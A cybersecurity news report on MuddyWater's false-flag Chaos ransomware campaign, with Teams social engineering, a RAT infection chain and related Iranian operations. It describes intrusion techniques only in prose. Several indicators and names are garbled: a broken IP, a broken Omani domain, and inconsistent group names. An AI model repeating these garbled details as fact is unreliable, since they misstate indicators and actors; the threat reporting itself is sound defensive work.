The Iranian state-sponsored hacking group known as Muddywater (aka Mango Sandstorm, Seedworm, and Static Kitten) has been held responsible for the ransomware attack, which has been described as a “false flag” operation.
The attack, spotted by Rapid7 in early 2026, was found to leverage social engineering techniques via Microsoft Teams to initiate the infection sequence. Although this incident initially appears to be consistent with a ransomware-as-a-service (RaaS) group operating under the Chaos brand, evidence suggests that this is a targeted state-backed attack masquerading as opportunistic extortion.
“This campaign was characterized by a high-touch social engineering phase conducted via Microsoft Teams, where the attackers used interactive screen-sharing to capture credentials and manipulate multi-factor authentication (MFA),” Rapid7 said in a report shared with The Hacker News.
“Once inside, the group bypassed traditional ransomware workflows, abandoning file encryption in favor of data exfiltration and maintaining long-term persistence through remote management tools like DWAgent.”
The findings indicate that Muddywater is attempting to obfuscate attribution efforts by increasingly relying on off-the-shelf tools available in the cyber crime underground to carry out its attacks. This change has also been documented by Ctrl-Alt-Intel, Broadcom, Check Point, and JUMPSEC in recent months, highlighting the adversary’s use of CastleRAT and Tsundere.
That said, this is not the first time Muddywater has launched a ransomware attack. In September 2020, the threat actor was attributed to a campaign targeting major Israeli organizations with a loader called PowGoop, which deployed a variant of the Thanos ransomware with destructive capabilities.
Then, in 2023, Microsoft revealed that the hacking group teamed up with DEV-1084, a threat actor known for using the DarkBit persona, to carry out destructive attacks under the pretext of deploying ransomware. Most recently in October 2025, attackers are believed to have used Killin ransomware to target an Israeli government hospital.
“In this case, the emerging picture was that the attackers were likely Iranian-affiliated operators, operating through the cybercriminal ecosystem, serving a strategic Iranian objective, using a criminal ransomware brand and methods associated with the broader extortion market,” Check Point said in March.
“The use of Kilin, and participation in its associated program, likely served not only as a layer of cover and plausible deniability, but also as a meaningful operational enabler, especially since earlier attacks appear to have heightened security measures and surveillance by Israeli authorities.”
Chaos is a RaaS conglomerate that emerged in early 2025. Known for its dual extortion model, the threat actor has advertised its affiliate program on cybercrime platforms like RAMP and RehubCom.
Attacks carried out by e-crime gangs leverage a combination of mail flooding and vishing using teams, often impersonating IT support personnel, to trick victims into installing remote access tools such as Microsoft Quick Assist, and then abuse that foothold to penetrate deeply into the victim’s environment and deploy ransomware.
“The group has also performed triple extortion by threatening distributed denial-of-service (DDoS) attacks against victims’ infrastructure,” Rapid7 said. “These capabilities are reportedly offered to affiliates as part of bundled services, which represents a notable feature of its RaaS model. Additionally, Anarchy has been observed leveraging elements of quadruple extortion, including threats to contact customers or competitors, to increase pressure on victims.”
As of the end of March 2026, Chaos has claimed 36 victims on its data leak site, the majority of whom are based in the US construction, manufacturing, and business services, some of the key sectors targeted by the group.
In the intrusions analyzed by Rapid7, the threat actor is said to have initiated external chat requests through Teams to connect with employees and gain initial access through screen-sharing sessions, then used compromised user accounts to conduct reconnaissance, establish persistence using tools such as DWAgent and AnyDesk, subsequently migrate, and exfiltrate data. The victim was then contacted through email to negotiate the ransom.
“When connected, TA [threat actor] executed basic search commands, accessed files related to the victim’s VPN configuration, and instructed users to enter their credentials into locally created text files,” Rapid7 explained. “In at least one instance, TA also deployed a remote management tool (AnyDesk) to further facilitate access.”
The threat actor has also been observed using RDP to download an executable (“ms_upd.exe”) from an external server (“172.86.126″).[.]208”) using the curl utility. Upon execution, the binary initiates a multi-stage infection chain that delivers more malicious components.
Brief description of malware families is below –
- ms_upd.exe (aka StageComp), which collects system information and accesses the command-and-control (C2) server to drop the next stage’s payload (game.exe, WebView2Loader.dll, and Visualwincomp.txt).
- Game.exe (aka DarkComp), which is a special remote access trojan (RAT) that masquerades as a legitimate Microsoft WebView2 application. This is a trojanized version of the official Microsoft WebView2APISample project.
- WebView2Loader.dll, a legitimate DLL downloaded by ms_upd.exe. It is required by Microsoft Edge WebView2 to embed web content in Windows applications.
- Visualwincomp.txt is an encrypted configuration used by the RAT to obtain C2 information.
The RAT connects to the C2 server and enters an infinite loop to poll for new commands every 60 seconds, allowing it to run commands or powershell scripts, perform file operations, and generate an interactive cmd.exe shell or powershell.
The links to Muddywater’s campaign stemmed from the use of a code-signing certificate associated with “Donald Gay” to sign “ms_upd.exe”. The certificate has previously been used by threat clusters to sign their malware, including a CastleLoader downloader called FakeSet.
These findings underscore the growing convergence of state-sponsored intrusive activity and cybercriminal commerce to obscure responsibility and delay appropriate defensive responses.
“The use of the RaaS framework in this context could enable actors to blur the distinction between state-sponsored activity and financially motivated cybercrime, complicating attribution,” Rapid7 said. “Furthermore, incorporating elements of extortion and negotiation may help focus defensive efforts on immediate impact, thereby delaying identification of underlying persistence mechanisms established through remote access tools such as DWAgent or AnyDesk.”
“In particular, the apparent absence of file encryption, despite the presence of Chaos ransomware artifacts, represents a deviation from typical ransomware behavior. This inconsistency may indicate that the ransomware component serves primarily as a convenience or obfuscation mechanism rather than the primary purpose of intrusion.”
The development comes as Hunt.io revealed details of an Iranian-Nexus operation targeting Omani government institutions to infiltrate over 26,000 Justice Ministry user records, judicial case data, committee decisions and SAM and system registry hives.
“An open directory at 172.86.76[.]127, a routerhosting VPS in the United Arab Emirates, was exposed in an active infiltration campaign against the Omani government, with toolkits, C2 code, session logs, and exfiltrated data all sitting in plain sight,” the company said. “The primary target was the Ministry of Justice and Legal Affairs (mjla.gov).[.]Om).”
The discovery also coincides with the continued activity of pro-Iranian hacktivist groups such as Handala Hack, which claimed to have published details on approximately 400 US Navy personnel in the Persian Gulf and attacked the Fujairah port in the United Arab Emirates, enabling it to gain access to its internal systems and leak approximately 11,000 sensitive documents related to invoices, shipping records and customs documents.
“A month ago, we documented a broad increase in cyber operations linked to Iran – surveillance via hacked cameras, the leak of thousands of highly sensitive documents of Israel’s former military chief, and a measurable increase in attack volume across the region. We said then that even more increases were likely,” Sergei Shykevich, group manager at Check Point Research, told The Hacker News.
“The claimed attack on Fujairah port, if confirmed, is an escalation. What has changed is the nature of the threat: it is no longer about intelligence gathering or public embarrassment. Stolen port infrastructure data was allegedly used to enable physical missile targeting.”
“The cyber and kinetic domains are now clearly linked. This campaign is not slowing down. Every quiet period on the physical front has historically been followed by intense cyber activity – and what we are seeing now is the most serious manifestation of that pattern yet.”
